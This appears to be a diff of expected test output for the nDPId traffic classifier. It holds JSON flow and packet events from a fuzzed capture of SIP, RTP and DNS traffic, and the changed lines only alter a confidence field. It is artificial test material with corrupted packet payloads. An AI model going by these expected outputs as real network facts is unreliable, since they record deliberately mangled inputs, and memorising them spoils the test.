00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1120470985421,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985421,"pkt":"ADBUADRWAODtAW69CABFAADIa\/4AAIARFmbAqAEC1PIhJHUwncgAtNyMgGNvsAAABhg3lstxcX5wdvzF0Et0dn92T1BB0VhmZ2V\/Z294Y2ZmahQXFhQREBAVb2ZPemVlYWJoYE9\/YWZkcnV4bWwVFRVqZ2xpYn94ZmBnY2F0zfjXdmNiYXhveHJgaW5jUFlwZTFkYc9lamoREhAQEx4fHx0XahRvRl1F3V5ESXjQxFFR39TfQXR\/Z9L15ebs6JeW7+DslJOU6uqUn5CcnJKX+Ofs5+Hg6g=="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985421,"flow_last_seen":1120470985421,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985421,"flow_last_seen":1120470985421,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1120470985427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985427,"pkt":"ADBUADRWAODtAW69CABFAADIa\/8AAIARFmXAqAEC1PIhJHUwncgAtJlvgAhvsQAABrg3lstxkpfo6Zfq5frn5uz6+gt4emFkcGBneMvv7+rslZHuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1120470985429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985429,"pkt":"ADBUADRWAODtAW69CABFAADIbAAAAIARFmTAqAEC1PIhJHUwncgAtMoSgAhvsgAABVg3lstxRH1wXN719vLg7uHxw3h4ZHZhfE9UWV\/RzzPt5\/PklJOUlJXt4uzx+Pjm5vPHzf38\/fr05+3ikurj4ezn4+H6\/97AwEJ8S9DN9Vd1XdzJ8eDp6eXwzcXWRUJnZHhnYX96aHLW+ubo6eHg5\/DG\/MNRcE3B+ubNy+Xu7Obt7+qX4+7oy9fw3vLT3N1W19X49PBBf39jZnhmbBEdEWpqb2BweA=="} 
00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985504,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1120470985504,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985504,"pkt":"ADBUADRWAODtAW69CABFAADIbAMAAIARFmHAqAEC1vIhJHUwncgAtLaDgAhvtQAACTg3lstx6urs5ueUkJOXlZGWbOyVlOD46O7hzXXbxsfz\/OLg5ufawPH4wk3N8Obu7+Pv6unk4fj\/29jZ1\/7l4+Ht7JOXyOrs4vPPUfVQz97J5fLjl5GXkpyRl+jqk5aQlero4svh7+rslJfp6uP+9vbL+OLg5vj99\/LL9ub4+uTs6ZSVlJXp6Ojv7eqWkZOTnJORkpCbk5GXlpaRkJBK6ejp7JWXlw=="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985504,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985504,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1120470985511,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985511,"pkt":"ADBUADRWAODtAb+9CABFAADIbAQAAIARFm9RqAEC1PIhJHUwncgAtIfqgAhvtgAACdg3lstxlpDplp2cmZ6fkpaRle3n9PTy\/CVzAJKehIeEmJGRl52QlJaX6OOU6JaRlp2cn4WEhZ2RkJeV6WOQnZ6EhJOFh4WFmYWYk7+dkpCQ6u\/qkZ2fmYSYnZ6Rk5OU7OD6+Pbh4PTl+OTo6unl9eXi7f7c1VT\/+uiX6JSUkJCV7uXm\/Obu7pWWkZeW7OPpk5Ofm5+Yk5WV7untlJeSkpeV7+qWkA=="} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985511,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":633,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":20992,"global_ts_msec":1120470986363} 
00482{"packet_event_id":1,"packet_event_name":"packet","packet_id":633,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":146,"pkt_type":20992,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":146,"pkt_l4_len":0,"thread_ts_msec":1120470985511,"pkt":"ADBUADRWAODtAW69UgBFAACEbAVoAIARFqPAqAEC9PIhJHUxnckAcCyBgMgABjeWy3FCyQfKXvrGAwAAJMMAAAAJAAAGDIHKAAs3lstxAR0xMTg5NDI5Ny00NDMyYTlmOEAxOTIuMTY4LjEuMgYFU0lQUFMAAIHLAAY3lstxEHNlc3Npb24gc2h1dGRvd24AAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":1120470987237,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470987237,"pkt":"ADBUADRWAODtAW69CABFAABIbAYAAIARS0vAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVR5AmRrAAAhAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470983999,"flow_last_seen":1120470987237,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470987237,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":634,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470983999,"flow_last_seen":1120470987237,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470987237,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":635,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470989238} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":635,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470987237,"pkt":"ADBUADRWAODtAW69CABFAABIbAdtAIARS07AqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVN5AmRrAAAhAAE="} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470798172,"flow_last_seen":1120470806184,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470796941,"flow_last_seen":1120470984332,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":9266,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470796941,"flow_last_seen":1120470984332,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":9266,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1120471001245,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120471001245,"pkt":"ADBUADRWAODtAW69CABFAABEbDoAAIARSxvAqAECwKgBAQsGADUAMBixDAgAAAABEAAAAAAAATEBMAEwAzHvNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.1?7.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.1?7.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1120471001263,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1120471001263,"pkt":"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\/G50ZW50LUxlbmd0aDogMA0KTWF4LUZvcndhYmRzOiA3MA0KVXNlci1BZ2VudDoiTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuOC41MS4xNg0KDQo="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":640,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":488,"global_ts_msec":1120471001405} 00981{"packet_event_id":1,"packet_event_name":"packet","packet_id":640,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":522,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":522,"pkt_l4_len":0,"thread_ts_msec":1120471001263,"pkt":"AODtAW69ADBUADRWCABFAEH8AABAADcRijHU8iEjwKgBAhPEE8QB6DHXU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiAyOTg1ODE0N4M0NjViMDc1MkAyMTg1ODA1MS00NjViMDdiMg0KQ1MxcTogNSBSRUdJU1RFXw0KRnJvbTogWnNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9ODc5NzFhDQpUbzpqPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MDAtMDQwNzQtMTcwMWJhYzktMWRhYTBiNGM1DQpWaWE6IFNJJXMALjAvVURQIDE5Mi4xNjguMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTkuNzA7cnBvcnQ9NTA2MDticmFuY2g9ejloRzRiS25wODg4NjAxNi00NGIxNGZlMzE5Mi4xNjguMS4yDQpXV1ctQXV0aGVudGljYXRlOiBEaWdlc3QgcmVhbG09InNpcC5jeWJlcmNpdHkuZGsiLG5vbmNlPSIxNzAxYmFiZDJhZDY3JXMANWU2ZDZiZjE1NDQyYSVzACxvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsc3RhbGU9ZmFsc2UsYWxnb3JpdGhtPU1ENQ0KQ29udGVuLy1MZW5ndGg6IDANCg0K"} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1120471001714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471001714,"pkt":"ADBUADRWAODtAW69CABFAABIbDwAAIARSxXAqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":1120471002706,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471002706,"pkt":"ADBUADRWAODtAW69CABFAABIbD8gAIARSxTAqAECwKgBAQsHADUANKe0gjgBAAABAAAAAAAABF9zaXAEXXVkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":643,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120471004709} 